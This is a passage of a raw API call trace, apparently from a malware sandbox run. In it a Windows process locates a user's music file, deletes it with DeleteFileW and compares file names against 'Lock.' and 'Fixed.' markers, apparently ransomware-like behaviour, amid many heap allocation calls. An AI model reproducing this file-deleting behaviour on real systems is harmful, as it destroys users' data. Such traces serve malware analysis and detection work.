[0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0252.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3", lpFilePart=0x8bedfc*="LVDYQUpAZwEha.mp3") returned 0x35 [0252.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0252.318] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lvdyqupazweha.mp3")) returned 0x20 [0252.318] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0f9410, ftCreationTime.dwHighDateTime=0x1d4d048, ftLastAccessTime.dwLowDateTime=0x6f26a9f0, ftLastAccessTime.dwHighDateTime=0x1d4c9b7, ftLastWriteTime.dwLowDateTime=0x6f26a9f0, ftLastWriteTime.dwHighDateTime=0x1d4c9b7, nFileSizeHigh=0x0, nFileSizeLow=0xa2ab, dwReserved0=0x12de, dwReserved1=0x4, cFileName="LVDYQUpAZwEha.mp3", cAlternateFileName="LVDYQU~1.MP3")) returned 0xaa5660 [0252.318] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lvdyqupazweha.mp3")) returned 1 [0252.320] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0f9410, ftCreationTime.dwHighDateTime=0x1d4d048, ftLastAccessTime.dwLowDateTime=0x6f26a9f0, ftLastAccessTime.dwHighDateTime=0x1d4c9b7, ftLastWriteTime.dwLowDateTime=0x6f26a9f0, ftLastWriteTime.dwHighDateTime=0x1d4c9b7, nFileSizeHigh=0x0, nFileSizeLow=0xa2ab, dwReserved0=0x12de, dwReserved1=0x4, cFileName="LVDYQUpAZwEha.mp3", cAlternateFileName="LVDYQU~1.MP3")) returned 0 [0252.320] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0252.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.320] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0252.321] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.321] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0252.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0252.323] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3", lpFilePart=0x8bf658*="LVDYQUpAZwEha.mp3") returned 0x35 [0252.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0252.323] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lvdyqupazweha.mp3")) returned 0xffffffff [0252.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.324] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0252.324] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.324] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QeeT.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eeT.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eT.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0252.326] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x12) returned 0x2466dd0 [0252.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0252.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QeeT.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eeT.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eT.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0252.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0252.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0252.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0252.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.328] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0252.329] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0252.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0252.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.330] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0252.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0252.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.331] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0252.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0252.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.332] HeapFree (in: 